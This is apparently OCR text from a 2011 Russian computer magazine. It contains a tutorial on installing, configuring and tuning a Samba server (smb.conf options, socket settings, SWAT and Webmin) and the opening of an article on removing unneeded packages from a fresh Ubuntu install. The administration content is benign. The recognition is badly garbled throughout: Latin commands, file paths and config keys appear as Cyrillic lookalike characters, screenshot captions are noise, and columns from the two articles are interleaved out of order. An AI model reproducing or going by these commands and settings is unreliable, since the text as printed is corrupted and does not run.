расшаривания у себя на компе) части. После установки следует 
создать главный конфигурационный файл (если его нет) и запустить 
стартовый скрипт для активации серверной части. Например, для 
АгсЬ І_іпих команды будут выглядетьтак: 

# растап -5 ватЬа зтЬсІіепІ: 

► 090 



# ср /еІс/затЬа/зтЬ.соп-р.сІе-РаиІІ: /еіс/затЬа/зтЬ. соггР 

# /еІс/гс.сІ/затЬа зіагі: 

В некоторых системах следует запустить два демона: зтЬсІ (файло- 
вый) и птМ (демон имен). Собственно, за расшаривание папок и 
прочие функции отвечает серверная часть ВатЬа, а за доступ куже 
расшаренным на других компах — консольная утилита зтЬсІіепІ:. В 
качестве фронт-энда к ней выступает часть функционала распро- 
страненных файловых менеджеров, таких как ОоІрЫп или ЫаиЫиз. 
В них настройка осуществляется не намного сложнее, чем в винде, 
поэтому здесь останавливаться не будем. Кроме зтЬсІіепІ суще- 
ствует еще ряд программ, облегчающих жизнь в консоли, кратко 
рассмотрим наиболее используемые. 

1. зтЬсІіепІ: — клиент, который можетобщаться с БМВ-сервером. 
Он предлагает интерфейс, схожий с интерфейсом программы 
11р. Среди его возможностей — получение файлов с сервера на 
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Текущее состояние дел: 
5атЬа 3.5 



Основным нововведением в версии 3.5 стала 
экспериментальная поддержка протокола ВМВ2, 
использующегося в системах ѴізІа/Ве7еп. Благодаря 
значительному упрощению ВМВ2 (было более 100 
команд, а стало 19] повысилась и производительность 
при передаче файлов. Среди прочих изменений: 

1. Обеспечена 100-наносекундная точность установки 
времени изменения или создания файлов (бтезФтр 
гезоіиііоп). Для поддержки необходимо Ытіх-ядро 
минимум версии 2.6.22 и діібс 2.6. 

2 . Добавлена поддержка шифрования соединений 
при выводе на печать через сервер СБРВ. Включение 
производится через параметр «сирз епсгурі». 

3. В ѴѴіпЬіпсІ проведен рефакторинг кода с целью 
реализации асинхронной обработки запросов. 
Например, «ѵѵбіпбо -д» или «ѵѵбіпбо -и» теперь 
выполняются в неблокирующем режиме. 

Последняя стабильная версия на данный момент 
находится под номером 3.5.6 и вышла в свет 8 октября 
2010 года. 



Мануал по зтЬ.сопІ удался на славу — 8076 
строчек 



Что нам готовит день 
грядущий: 5атЬа 4.0 



Проект ВатЬа4 более пяти лет развивается параллельно 
с ВатЬаЗ и содержит почти полную переработку кода в 
контексте реализации работы в качестве Асбѵе Оігес- 
Іюгу Ботаіп СопФоНег (совместимый с ѴѴіп2к и выше] и 
приведения поддерживаемого ВМВ-протокола к полной 
совместимости с продуктами МісгозоФ Реализованы 
встроенный ШАР-сервер, поддерживающий Асбѵе 
Бігесіюгу правила; встроенный КегЬегоз КБС (Кеу 
ОізІтіЬибоп Сепіег] сервер; АСІ_ в базе пользователей; 
виртуальная файловая система (Місгозо^ ѴР5] итак 
далее. 

Основным нововведением разрабатываемой версии 4.0 
станет возможность использования ВатЬа-сервера в 
качестве контроллера домена Асбѵе Оігесіогу. Данная 
возможность реализована в версиях 3.x, но в сильно 
урезанном виде. После трех лет разработки первый 
технический релиз 4.0.0ТР1 был выпущен в январе 
2006 года. Впоследствии альфа-релизы появляются 
регулярно. Последняя версия 4.0.0-аІрЬа 1 4 выпущена 24 
декабря 2010 года. 



локальную машину, перемещение файлов с локальной 
машины на сервер, получение списка папок с сервера 
и так далее. 

2. зпгіЫхее — ВМВ-обозреватель в текстовом режи- 
ме. Аналог «Обозревателя сети», существующего на 
компьютерах под управлением ѴѴіпсІоѵѵз. Отображает 
дерево всехдоменов, сервера этихдоменов и общие 
ресурсы на серверах. 

3. тоипі.сі^з и итоипі.сі^з отвечаютза монтирование 
и размонтирование файловой системы Ыпих СІРВ. 

Эти программы работаюттолько в Ыпих, ядро должно 
поддерживать файловую систему СІРВ. Как вариант, 
для этих целей можно использовать команду тоипі с 
аргументом ‘-і сіі'з’ , либо '-Г (для раз монтирования). 

В старые версии пакета ВатЬа входили утилиты 
зтЬтоипІ и зтЬитоипр которые, по сути, заменены на 
тоипі.сііъ и итоипі.сііъ. 

Пилим конфиг 

В конфиге ВатЬа доступно несметное количество 
опций, при желании их все можно найти в справочной 
странице зтЬ.соп^Б). Поэтому для простоты приведу 
минимальный рабочий конфиг, а далее расскажу про 
наиболее интересные параметры, которые можно в 
него добавить: 



$ саѣ /еѣс/затЬа/зтЬ.соп-Р 
[§1оЬа1] 

; Имя рабочей группы 
ыопк§поир = ІлІККСКР 
; Уровень безопасности 
зесиггбу = ЗНАКЕ 
[шузЬаге] 

; Абсолютный путь к разделяемому ресурсу 
раѣЬ = /изг/зошемЬеге/зІіагесІ 
; Доступ только на чтение 
геасі опіу = Уез 

; Доступ будет предоставлен с правами гостевого 
пользователя (поЬосІу) 

§иез1: ок = Уез 

Функциональность этого конфига сводится к расшарива- 
нию папки /изг/зотеѵѵЬеге/зЬагесІ для всех пользовате- 
лей рабочей группы ѴѴПКѲПР без возможности записи. 
Конфиг состоит из нескольких секций (в данном случае 
двух), в секции діобаі определяются общие параметры 
сервера, остальные секции могут называться произволь- 
ными именами (за исключением имен специальныхсек- 
ций), и в них задаются настройки для каждого разделяе- 
мого объекта (в примере использован объект тузЬаге). 




[ НТТР://ѴѴѴШ 

і г 

> Ііпкз 

• Официальный 
сайт проекта ВатЬа: 
затЬа.огд ; 

• интересная статья 
про настройку ВатЬа 
в роли РБС: ореппеС 
ги/Ьазе/пеі/затЬа 
рсіс зІаскѵѵаге.М. 
Ыті ; 

• русскоязычный 
ресурс с множеством 
статей и переводов 
по теме: зтЬ-сопбги . 




• Протокол СІРВ 
является преемником 
протокола ВМВ, под- 
держивается боль- 
шинством серверов 
ѴѴіпсІоѵѵз и множе- 
ством других коммер- 
ческих серверов, а 
также хранилищами 
ІЧеЬл/огк АНасЬесІ 
ВФгаде. 

• У проекта сущест- 
вует форк ВатЬа- 
ТНО, который возник 
в 2000 году из-за 
разногласий раз- 
работчиков, но так и 
не получил широкого 
распространения. 

• В условиях много- 
пользовательского 
доступа скорость 
работы ВатЬа в 
качестве файлового 
и принт-сервера 
более чем в два раза 
выше по сравнению 
с ѴѴіп2кЗ с теми же 
ролями (по исследо- 
ваниям ІТЬаЬз]. 
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ІІЫІХОЮ 




Создание шары в файловом менеджере Ыаиіііиз: 
быстро, но настроек минимум 

Для расшаривания принтеров существует специальная секция 
ргіпіегз, которая в большинстве случаев имеет следующий вид: 
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Просматриваем доступные разделяемые ресурсы на 
локальной машине 

9. сіігесіогу тазк — аналог предыдущей опции, только для директорий. 

10. ЬгоѵѵзеаЫе — определяет, будет ли объект отображаться в списке 
доступных общих ресурсов в сетевом окружении и в списке просмотра. 



[ргіпѣегБ] 

раТИ = /изг/зрооІ/риЬІіс 
§иез1: ок = уез 
ргіпѣаЫе = уев 

Для автоматической активации принтеров в секцию діобаітакже 
следуетдобавитьстроку«ІоасІ ргіпіегз = уев». 

Другие важные параметры конфига: 

1 . зесигііу — определяет, каким образом клиенты соединяются с 
сервером. В примере выше этот параметр был установлен взначение 
5НАРЕ — для такого соединения не будут запрашиваться имя пользо- 
вателя и пароль. В большинстве случаев используется значение ІІ5ЕР, 
которое подразумевает ввод логина и пароля существующего пользо- 
вателя для доступа к шаре. Кроме того, у этого пользователя должны 
быть соответствующие права на содержимое папки. 

2. Ьозізаііоѵѵ — список хостов через пробел, с которых разрешен 
доступ к расшаренным ресурсам. Допускается задавать символиче- 
ские имена, ІР-адреса или диапазоны адресов, например элемент 
вида «150.203.» разрешает соединения со всех ІР-адресов подсети 
150.203.0.0/16. Если параметр не задан, то соединения разрешены 
для всех. Параметр можеттакже применяться к отдельным секциям, 
позволяя гибко разграничивать права доступа. 

3. Іод Іііе — путь записывания логов. Здесь стоит отметить возмож- 
ность задания переменных в конфиге: например, значение «/ѵаг/іод/ 
5атЬа/%т.1од» позволит создавать отдельный лог-файл для каждой 
подключающейся машины, что весьма полезно для мониторинга 
активности отдельных клиентов. 

4. іпсіисіе — позволяет подключать произвольные конфиги. Наиболее 
эффективен при использовании с переменными, например «%т», 
втаком случае для разных клиентов можно задавать различные на- 
стройки: іпсіисіе = /изг/ІосаІ/5атЬа/ІіЬ/зітіЬ.сопІ.%т. 
б.іпіегіасез — список сетевых интерфейсов, на которых будут висеть 
демоны БаппЬа. По умолчанию задействуются все интерфейсы, кроме 
Іо. Имена нужно задавать через пробел, либо указывать записьвида 
«адрес сети/маска». 

6. диезі опіу — если этот параметр выставлен в «уез», то доступ к раз- 
деляемому ресурсу возможен только с правами гостя. 

7. іпѵаіісі изегз — задает через пробел список пользователей, которым 
запрещен доступ к разделяемым ресурсам. Здесьже можно задать 
группу II ІМІХ/ІМ 15, использовав в качестве префикса «0» или «+» соот- 
ветственно. 

8. сгеаіе тазк — маска прав доступа для созданныхфайлов. Поумолча- 
нию равна 0744, что означаетсброс прав на исполнение для пользовате- 
лей группы и остальных. Задается в секции разделяемого ресурса. 



[риЬІіс] 

сгеаѣе тазк = 0400 
сіігесѣогу тазк = 0700 
раіііі = /ехрогІі/риЫіс 
ыгіѣеаЬІе = уез 
[агсбіѵе] 

раіііі = /ехрогіі/агсіііѵе 
ыгіѣеаЬІе = по 
ЬгоызеаЫе = по 

Тонкая настройка и оптимизация 

5атЬа предоставляет нам широкие возможности по оптимизации. 
Одной из них является директива зоскеіз орііопз. Однако не суще- 
ствуетуниверсального способа добиться максимальной производи- 
тельности, так как все сети различны (тип соединения, тип оборудо- 
вания и такдалее) 

Если ты хочешьувеличить скорость передачи файлов в своей сети, 
то придется поэкспериментировать. В своих рассуждениях я буду 
опираться на особенности реализации интерфейса сокетов в Еіпих 
(об этом можно почитать в руководстве зоскеі(7)). Первым делом до- 
бавим в конфигурацию 5а тЬа следующую запись: 

[§1оЬа1] 

зоскеіі орііопз = ТСР_І\ІСЮЕІ_АѴ ІРТ05_І_ОІлЮЕІ_АѴ 
50_КСѴВиР=65536 50_5І\ЮВІІР =65536 

Смысл параметров: 

1 . ТСР_1\1(ЮЕ1_АУ отвечаетза задержку пакетов. Начиная с 5атЬа 
2.0 данный параметр устанавливается поумолчанию, в более старых 
версияхего установка может привести кускорению работы на 30%. 

2. ІРТ05_І_0Ѵ\ШЕІ_АѴ — еще один параметр для оптимизации про- 
пускной способности. Но он затрагивает работу роутеров и конечных 
систем, а не сервера. Этот параметр должен использоваться вместе с 
ТСР_ЫСЮЕЕАѴ и может обеспечить прирост производительности до 
20 %. 

3. Опции 50_ГССѴВІІР и 50_5М0ВІІР определяютмаксимально воз- 
можный размер буферов приема и передачи 5а тЬа. Уменьшение 
размера буферов приводит кувеличению фрагментации пакетов, 
увеличение размера — к уменьшению фрагментации. 

Чтобы найти оптимальные параметры для конкретных условий, 
надо провести эксперименты по передачетестового файла раз- 
мером 1 00 Мб и 100 тестовых файлов по 1 Мб, затем оценить время 
выполнения операций. Для создания 1 00-мегабайтного тестового 
файла выполни команду: 
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[дІоЬаІ ] 



# шогкдгоир = ЫТ-ОотоЩ-Моте ог иіогкдгоир-Нате, ед: ИШЕЯРТН 

иогкдгоыр = МУ6Р01ІР 



Й гегѵег зігілд із Іке едиіѵаіепі о Т іЬе 
зег^ег зігіпд = ЗатЬа бегѵег 



НТ Резсгірііоп ИеЫ 



й Зесигііу тосіе, Оеііпез іп шНісЬ тосіе ЗатЬа ыі I I орегаіе, РоззіЫе 
Й ѵаісіее аге БІпаге, изег, зегѵег, йотвіп алсі асіз. ГІозІ реоріе ин і 1 шапі 
# изег ІеѵеІ зесигііу, 5 ее ііче ЗетЬе- КОНТО- Со Песіі оп, (ог сіеіаііз. 

зесигііу = изег 



Й ТЫг орііоп І5 ітрогівпі Тог зесигііу. [ і а11ош5 уои То геьігісТ 
й соппееТіопз То тасЬіпез иЫсЬ аге оп уоиг іосаі пеішогк, ТКе 
Й Тоіішіпо екатріе гезТгісТе аесезз То Тшо С сІа55 поТшогкз апгі 
# ТЬе "ІоорЬаск" іпТегТасе. Гог тоге ехетр1е& оТ ТЬе эупівм &ее 
й ТЬе эшЬ.сопТ топ роде 

; ЬозТк аіісиі = 192,168.1, 192.166,2. 127, 



I Г уои иопТ То оиТотоТісоІ 1 у 1 оосі уоиг ргіпіег I ізТ гоТНег 
ІЬап зеіііпд ТЬет ир іпсіі ѵіЗиаІ 1 у ТЬеп уои ' 11 пеесі ТЬіз 
ІоасІ ргіпТегз = уе 5 



уои тау шізк То оѵеггійе ТНе ІосоТіоп 

ргіпТсар пате = /еіе/ргіпісар 



оТ ТКе ргі пТсар Ше 



34, 1 



8 % 



Дефолтный зтЬ.сопТ неплохо откомментирован 



$ сісі і-р=/сІеѵ/ 2 его о-Р^ез'ЬйІе соип1:=1Ѳ24Ѳ Ьз=10240 

Для создания 1 00 файлов размером 1 Мб поможет сле- 
дующий скрипт: 

$ са± ткйіез.зіі 

#! /Ьіп/Ьавіі 

-Рог ((і=1; і<=100; і++)); сіо 

сісі і-р=/сІеѵ/ 2 его о-Р=1:е5І:Рі1е${і} соип1:=1024 Ьв=1024 
сіопе 

Далее нужно примонтировать шару: 

$ тоипі: -1: сі-Рб -о §иез1: //192.168.1.101/зІіа ге \ 
/Ііоте/изег/зііапе/ 

И провести копирование с замером времени: 

$ Іііте ср /Ііоте/и5ег/5Ііапе/1:е5І:Рі1е /Ііоте/изег/ 

Результаты, получившиеся у меня, можешь наблюдать 
на рисунке (шкала У — время копирования в секундах). 
Примечание: сервер 5а тЬа имеет привычку кэши- 
ровать передаваемые данные, поэтому рекомендую 
перезапускать его при каждом новом тесте. В конфи- 
ге зтЬ.сопІ 1 можно задать ряд параметров, которые 
так или иначе будут сказываться на производитель- 
ности: 

1. ЫсІеПІез — в этом параметре задается списокфайлов 
или директорий, которые будут скрыты при просмотре 
разделяемого ресурса (но будут доступны при прямом 
обращении). Список задается через знак «/», и чем спи- 
сокдлиннее, тем больше будутзадержки при просмотре 
разделяемого ресурса, так как все файлы прогоняются 
на соответствие каждого элемента списка. Без крайней 
необходимости лучше не использовать. 



2. зігісі зупс — установленный в «уев», этот параметр 
заставляет сервер при каждом новом пакете суста- 
новленным битом зупс сбрасывать дисковые буферы 
непосредственно на диск, что существенно снижает 
производительность при работе с некоторыми прило- 
жениями, но при установке в «по» появляется некото- 
рая вероятность потери данных во время сбоя. 

3. зупс аіѵѵауз — включение этого параметра означает 
сброс содержимого каждого нового пакета на диск, ми- 
нуя дисковые буферы и вне зависимости от бита зупс. 
Весьма пагубно сказывается на производительности, 
поэтому включать рекомендуется только если сервер 
ЗатЬа работает нестабильно. 

4. ѵѵісіе Ііпкз — параметр определяет, могут ли ис- 
пользоваться символические ссылки в разделяемых 
ресурсах. Выключение этого параметра приведет к 
дополнительному системному вызову при открытии 
каждого файла. 

5. сіеасИіте — значением этого параметра является 
время бездействия в минутах, по истечении которого 
соединение с клиентом будет разорвано. По умолча- 
нию установлено в 0, то есть соединение с клиентом 
не будет разорвано никогда. При большом количестве 
клиентов это может привести к проблемам в работе, 
поэтому рекомендую изменить значениена 15. 

6. плах соппесііопз — максимальное число одно- 
временных подключений к серверу. По умолчанию 
выставлено в 0 (то есть без ограничений), что может 
привести к отказу в обслуживании на слабых системах 
или в случае намеренной атаки. В большинстве случа- 
евзначения 1 0 вполне хватает. 

7. Іод ІеѵеІ — детализация логов, задается числом от 

0 до 10. За письна диск — весьма затратная операция, 
поэтому не рекомендуется выставлять этот параметр 
в значение больше 2, за исключением отладочных 
ситуаций. 




> СІѴСІ 



На прилагаемом к 
журналу ОѴО-диске 
ты найдешь исход- 
ные коды 5атЬа и 
ѴѴеЬтіп. 
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СІиЬаІ Рягвѵтіяіагэ- 



ОЛіЧ ѴН* и Шлк 
Оетой-Модій Ваис Ашпн 



іЦщгіОтаі іЦиУиМи-і 



ІІЙЙІ брЪДОѴі 

НСЕ «Ьсіѵігі 



ж- 



ѴѴеЬтіп — это не только гламурный веб-интерфейс, но 
и удобная настройка сервера ЗатЬа 

8. зузіод — параметр отвечаетза попадание событий в систем- 
ный зузіод. По умолчанию равен 1 , что означает запись ошибок и 
предупреждений. Можно понизить до 0, тогда будут записываться 
только ошибки. 

Следуеттакже отметить, что ощутимую прибавку к производитель- 
ности может дать использование асинхронного ввода-вывода. 
Правда, для этого необходимо пересобрать ЗатЬа с опцией АІ0_ 
51ІРР0РТ, после чего добавить в кон фи г следующие параметры: 



й±з 



ілтігл* 



■ц!М 

Л ОіГ#А 



Привет, 90-е! Штатная утилита 5ѴѴАТ для редактирова- 
ния зтЬ.соггі через браузер 

выдерживает никакой критики, но она полезна с точки зрения 
тонкой настройки, поскольку показывает все возможные параме- 
тры конфига и дает контекстные подсказки к каждому из них. Для 
корректной работы необходимо доустановить пакет хіпеіеі: 

# растап -5 хіпеіеі 



аіо геасі зііе = 16384 
аіо ѵѵгііе зііе = 16384 
аіо мгііе ЬеЬіпсІ = ігие 

БНііИаррепз 

При работе с ЗатЬа могут вылезти различного рода косяки и грабли, 
примеры, для распространенных из них. Для решения проблемы с 
отображением кириллических символов рекомендуется выставить 
следующие параметры в секции діобаі: 

сІ05 сИагзеі: = ср866 
ипіх сИагзеі: = ІІТР8 
сіізріау сИагзеі: = ІІТР8 

А если в твоей системе нет и не планируется развертывание серве- 
ров печати СІІР5, то в логах периодически будут появляться ошибки 
по этому поводу. В таком случае лучше отключить поддержку печати 
в ЗатЬа, добавив в секцию діобаі следующие строки: 

ІоасІ ргіпіегз = по 

бЬом асісі ргіпіег ыігагсі = по 

ргіпі:іп§ = попе 

рпіпісар пате = /сіеѵ/пиіі 

сІізаЫе врооІББ = уеБ 



Затем привести файл /еіс/хіпеісі.сі/зѵѵаі к следующему виду: 

Бегѵісе бмэі: 

{ 

іуре = ІЛЧЫ5ТЕ0 
рпоіосоі = іер 
рогЬ = 901 

5оскеі:_1:уре = Бігеат 
ыаіі = по 
изег = гооТ 

Бепѵег = /иБг/БЬіп/БыаІ: 

1о§_оп_5иссе55 += Н05Т РІІКАТІОМ 
1о§_оп_-Раі1иге += Н05Т 
сІІБаЬІе = по 
} 

Ата кже добавить в файл /еІс/ЬозІз.аІІоѵѵ строку «зѵѵаЕ 127.0.0.1». По- 
сле чего запустить демон хіпеіеі: 

# /еіс/гс.сі/хіпеісі зТагі: 

И вуаля! 5ѴѴАТ доступен по адресу Ыір ://1оса ІЬозІ; :90 1 . 
Альтернативным средством для управления параметрами ЗатЬа из 
браузера является ѴѴеЬтіп, который имеет приятный интерфейс и 
множество функций для управления системой. 



ѴѴіпХР — достаточно древняя и глючная система, но.темнеменее, 
множество людей остаются ей верны. При использовании разделя- 
емых ресурсов эта операционка открывает соединения сразу к двум 
портам: 139/іср и 445/іср. Если ей это удается, то на 139-м порту сое- 
динение она разрывает, что приводит к появлению в логах записи 
«деіреегпате іаііесі. Еггогѵѵаз Тгапзрогі епброіпі із поі соппесіеб». 
Чтобы ошибка не возникала, необходимо добавить в секцию діобаі 
строчку «зтЬ ро гіз = 139». 

СІІІ в помощь 

С помощью 5ѴѴАТ (ЗатЬа ѴѴеЬ Асітіпізігаііоп Тооі) можно кон- 
фигурировать самбу прямо из браузера. Интерфейс утилиты не 



# растап -5 меЬтіп регІ-пеі-ББІеау 

# /еіс/пс.сІ/ыеЬтіп зТагі: 

После установки и запуска демона веб-морда будет доступна по 
адресу Ьир5://ІосаІЬозЫ 0000. 

Подводим итоги 

Процесс настройки ЗатЬа — это сложная и интересная задача. 
После оптимизации у меня получилось сократить время передачи 
файлов в среднем на 20%. Возможно, твои успехи в этом будут на- 
много лучше: в некоторых источниках сообщается об ускорении аж 
до 200%. пс 



► 094 



ХАКЕР 04 /147/ 201 1 





ІШІХОЮ 



■ ■ Евгений Зобнин (гоЬпіпіадтаіІ.сот) 




ДИЕТА 

ДЛЯ ПИНГВИНА 

Чистим свежеустановленный ІІЬипІи от хлама 

• Ты никогда не задумывался о том, почему свежеустановленный 
Шиіпіи с базовым графическим интерфейсом и мизерным набором 
стандартных приложений занимает целых 2 Гб дискового простран- 
ства? Если да, то читай дальше - мы посадим пингвина на диету и 
сделаем так, чтобы он занимал гораздо меньше места. 



Постановка проблемы 

Сегодняшние дистрибутивы Ыпих не только быстры, удобны 
и приятны глазу, но и невероятно громоздки. В стандартной 
комплектации большинство из них занимает больше 4 Гб. И 
это при том, что они способны обеспечить пользователя только 
одной графической средой и небольшим набором приложений (к 
слову сказать, нет даже кодеков для воспроизведения аудио- и 
видеофайлов). Куда же утекают заветные гигабайты свободного 
пространства? 

Как это ни странно, причина прожорливости Ыпих скрывается в 
его главном достоинстве. Хороший дистрибутив Ыпих — очень 
гибкая операционная система, способная подстроиться подлю- 
бого пользователя и любое оборудование. В нем есть все для того, 
чтобы удовлетворить потребности 99% юзеров: огромное количе- 
ство драйверов, способных вдохнуть жизнь практически в любую 
железку; куча разных демонов, апплетов и виджетов, делающих 
общение с этими железками простым и понятным; набор из 



самых востребованных пользователями приложений; поддержка 
нескольких языков; различные инструменты для людей с ограни- 
ченными возможностями и многое другое. Все это может и должно 
занимать определенное пространство на жестком диске. 

Ыпих предоставляет не меньшую свободу выбора и программи- 
стам. Не имея какого-либо стандартизированного интерфейса 
общения с операционной системой в виде единого АРІ, такого как 
ѵѵі п32 в ѴѴі п сіоѵѵз или Сосоа в Мае 05 X, Ыпих поощряет исполь- 
зование любых удобных для программиста интерфейсов и сред 
исполнения. Разработчик волен сам выбирать библиотеки гра- 
фических интерфейсов, будьто 6ТК, СИ: или даже Р1_ТК. Он может 
использовать любые подручные либы, не беспокоясь о том, что 
их не окажется на целевой системе, ведь менеджер пакетов все 
равно самостоятельно установит их. Он может писать приложения 
практически на любом из существующих языков программирова- 
ния, и все необходимые интерпретаторы, виртуальные машины и 
библиотеки точно также будут доустановлены в автоматическом 
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■ ■ Евгений Зобнин (гоЬпіпіадтаіІ.сот) 




ВІеасЬВй: кроссплатформенная утилита для очистки кэша 
приложений 



Куча ядер в загрузочном меню 



Со временем загрузочное меню ІІЬипІи может обрасти большим 
количеством вариантов ядер (после обновления ядра старое ядро не 
удаляется]. Чтобы очистить его, достаточно выполнить следующую 
команду: 

$ ар1:і1:исІе риг§е $(ар1:і1:исІе зеагсіі ~і1іпих- 
іта§е -Р%р|е§пер -ѵ "$(ипате -г) 1 1іпих-іта§е- 
§епегіс") 

режиме. Само собой разумеется, что при комплектации устано- 
вочного диска все эти бесконечные зависимости будут включе- 
ны в комплект, а во время установки попадут на жесткий диск 
пользователя. И не стоит даже надеяться на то, что разработчики 
дистрибутива будут подбирать софт, основываясь на его количе- 
стве зависимостей и следя за тем, чтобы они не тащили в систему 
ничего лишне го. Например, стандартная комплектация дистри- 
бутива ІІЬипІи включает в себя простую программу для ведения 
заметок То тЬоу, и эта небольшая программа та щит за собой весь 
ранта йм топо, занимающий более 30 Мб дискового простран- 
ства. В устройстве Ыпих-дистрибутива есть еще много различных 
нюансов, которые делают его более тяжеловесным, но описанные 
выше — это основа, от которой мы будем отталкиваться, избавляя 
пингвина от жирового слоя. 

Освобождаемся от хлама 

Начнем с то го, что попытаемся очистить систему от явно ненужно- 
го шлака, сохранив при этом оригинальный рабочий стол ІІЬипІи 
в почти неизменном виде и ставив все сколько-нибудь нужные 
приложения на месте. 

Итак, ставим II Ьипіи и выполняем «сіб - И». Объем занятого дис- 
кового пространства составляет ни много ни мало 1 .9 Гб. Сразу 
смотрим в меню приложений. Здесь у нас есть раздел Ѳатез, 
который вряд ли представляет какую-то ценность. Удаляем все его 
содержимое одной командой: 

$ біісіо ар1:-§е1: риг§е §поте-§ате5-соттоп §Ьгаіпу 

Пакет дпоте-да тез-сот топ утянет за собой аізіегіоі, дпоте- 
таіщопдд, дпоте-зисіоки, дпотіпе, циасігараззеі вместе со всеми 
конфигурационными файлами и освободит для нас20Мбпро- 




Пакеты Опоте в ІІЬипіи 

странства. Снова идем в меню, самое бесполезное теперь лежит 
в пункте Ассеззогіез. Это калькулятор (дсаісіооі), программа для 
исследования шрифтов (дисбагтар), анализатор использования 
дискового пространства (ЬаоЬаЬ), программа для поиска файлов 
(дпоте-зеагсб-іооі) и тот самый ТотЬоу. Удаляем: 

$ біісіо арТ-§е1: риг§е §са1с1:оо1 §исбагтар \ 

ЬаоЬаЬ §поте-зеагсІі-1:оо1 1:отЬоу 

Эта операция даст нам еще 1 0 Мб места и откроет возможность из- 
бавиться от топо. Выполняем: 

$ біісіо ар1:-§е1: риг§е топо-2. 0-§ас топо-сІіагр-БІіеІІ \ 
топо-§ас топо-§тс5 топо-гипѣіте 

Это еще 30 Мб. 

Вновь возвращаемся в меню. Из совсем неинтересного: програм- 
ма для за писис микрофона и редактор видео ріііѵі. К сожалению, 
сразу определить принадлежность диктофона к какому-либо паке- 
ту трудно, поэтому мы установим утилиту арМіІе, которая поможет 
это сделать: 

$ біісіо ар1:-§е1: іп5І:а11 аріі-іііе 
$ арѣ-біе ирсІа1:е 

$ арѣ-біе Беагсіі /и5г/Ьіп/§поте-5оипсІ-песопсІег 
§поте-тесІіа : /и5г/Ьіп/§поте-5оипсІ-гесопсІеп 

Нужный (точнее, не нужный) нам пакетзовется дпоте-тебіа, удаляем: 

$ біісіо ар1:-§е1: риг§е §поте-тесІіа 

Всего 2.5 Мб, зато меню будетчище. Далее на очереди идет словарь, 
ѴЫС-вьюер и клиент Ретоіе Оезкіор. В ряд л и они тебе нужны, но 
если вдруг нужны, ты можешь просто пропустить этот шаг: 

$ біісіо ар1:-§е1: риг§е §поте-сІіс1:іопагу \ 
матегісап ѵіпа§ге ІіБСІіепІ: гсІеБкІюр 

Еще 5 Мб и более чистое меню. Остальные программы можно 
пока оставить на месте и избавиться отхлама типа документации, 
плюшек для людей с ограниченными возможностями, примеров, 
хранителя экрана и системы тестирования ІІЬипІи: 

$ біісіо арТ-§е1: риг§е §поте-ассе5ІЬі1і1:у-1:Ііете5 
§поте-сІос-и1:іІ5 §поте-та§ §поте-5сгееп5аѵег 
5сгееп5аѵеп-сІе-Раи11:-іта§е5 х5сгееп5аѵеп-\* 

§поте-и5ег-§иісІе ехатріе-сопііепі: сбескЬох\* 

ЬгапсІіп§-иЬип1:и 

Так мы освободим еще 167Мб пространства. Далее разберемся с 
«повисшими» зависимостями — пакетами, которые были пере- 
числены в зависимостях уже удаленных нами пакетов и теперь 
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не нужны. Для этого нам понадобится программа 
огрбапег, включенная в пакет беЬогрбап: 

$ біісіо ар1:-§е1: іп5І:а11 сІеЬограп 

Запускаем программу, видим список «сирот», отмеча- 
ем их с помощью пробела и выбираем кнопку «ОК». В 
конце процедуры снова будет выведен список, на этот 
раз в нем перечислены «сироты сирот». Повторяем 
все действия до тех пор, пока спи со кне окажется пуст. 
Дальнейшая чистка неизбежно скажется на функцио- 
нальности и внешнем виде дистрибутива, поэтомутем, 
кто любит II Ьипіи таким, какой он есть, лучше оста- 
новиться на достигнутом. Всем остальным — добро 
пожаловать в следующий раздел статьи. 

Большая уборка 

ІІЬипІи включает в себя достаточно много приложений, 
и далеко не каждое из них устраивает всех пользовате- 
лей. Я, например, уже несколько лет не пользуюсь по- 
чтовыми программами, предпочитая им ѵѵеЬ-интерфейс 
дтаіі, а от интерфейса стандартного ІІЬипІи-плеера 
РбуІтЬох меня тошнит (как, впрочем, и от его идейных 
родителей — Ата го к и іТипез). Поэтому для меня они 
не представляют никакого интереса и только загро- 
мождают меню. Кому-то другому могут быть не нужны 
ІМ-клиент и офисный пакет. И от всего этого можно без- 
болезненно отказаться. 

Наверное, самый «толстый» компонент ІІЬипІи - это 
ОрепСЖісе. Он, конечно, очень нужен, если ты студент, 
препод или секретарша, но большинству людей он со- 
вершенно не сдался, поэтому избавляемся: 

$ біісіо ар*-§е1: риг§е орепо-Р1йсе\* 

Еще 256 Мб чистоты. Очень неплохо. Следующие на 
очереди: неудобный таіі-клиент Еѵоіиііоп, совершенно 
никакой видеоплеер Тоіет и аудиопроигрыватель для 
любителей лицензионной музыки РбуІтЬох: 

$ біісіо ар1:-§е1: риг§е еѵоіиѣіоп еѵо1и1:іоп-соттоп 
еѵо1и1:іоп-сІа1:а-5егѵег еѵо1и1:іоп-іпсІіса1:ог 
еѵо1и1:іоп-р1и§іп5 еѵо1и1:іоп-іл/еЬса1 ІіЬеѵоІиІііоп 
ѣо'Ъет 1:о1:ет-соттоп 1іЫ:о1:ет\* пІіуѣтЬох тесііа- 
рІауег-ігѵРо 1іЬ§поте-тесІіа0 

Это еще 26 Мб и сильное ощущение своей право- 
ты. Теперь можем удалить мультимедиа-фреймворк 
дзігеатег, используемый Тоіет и РбуІтЬох, однако 
здесь есть два подводных камня. Во-первых, дзігеатег 
сильно завязан на всю систему, и полное избавление 
от него повлечетза собой удаление некоторых нужных 
системных пакетов. Мы можем избавиться только от 
подсобных пакетов фреймворка, но даже в этом случае 
придется попрощаться с программой для прожигания 
дисков В газе го. Если это не принципиально, то делаем 
следующее: 

$ біісіо арТ-^еІ: риг§е §5І:геатег0. 1Ѳ-аІ5а 
§5І:геатеп0. 10-попІіп §5І:геатег-0. 10-пісе 
§5І:геатеп0. 10-р1и§іп5-Ьа5е §5І:геатег0. 10- 
р1и§іп5-Ьа5е-арр5 §5І:геатег0. 10-р1и§іп5 §оосІ 
§5І:геатег0. 10-риІ5еаисІіо §5Ітеатеп0. 10-1:ооІ5 
§5І:геатег0. 10-х §поте-сосІес-іп5І:а11 Ьга5его\* 

В комплекте ІІЬипІи идет менеджер фото 5Ь оіѵѵеіі. Мо- 




Без огрЬапег осиротевшие пакеты было бы гораздо труднее 
найти 



жет быть, он и удобен тем, кто делает по пятьдесят фото- 
графий в день, но обычному человеку гораздо удобнее 
смотреть фотки через ІМаиІІІиз: 



$ біісіо ар1:-§е1: риг§е 5Ііо1:іл/е11 

Это 4 Мб. Еще есть та кие штуки, как ІМ-клиент Етраібу 
и клиент социальных сетей ОѵѵіЬЬег. Во многом полез- 
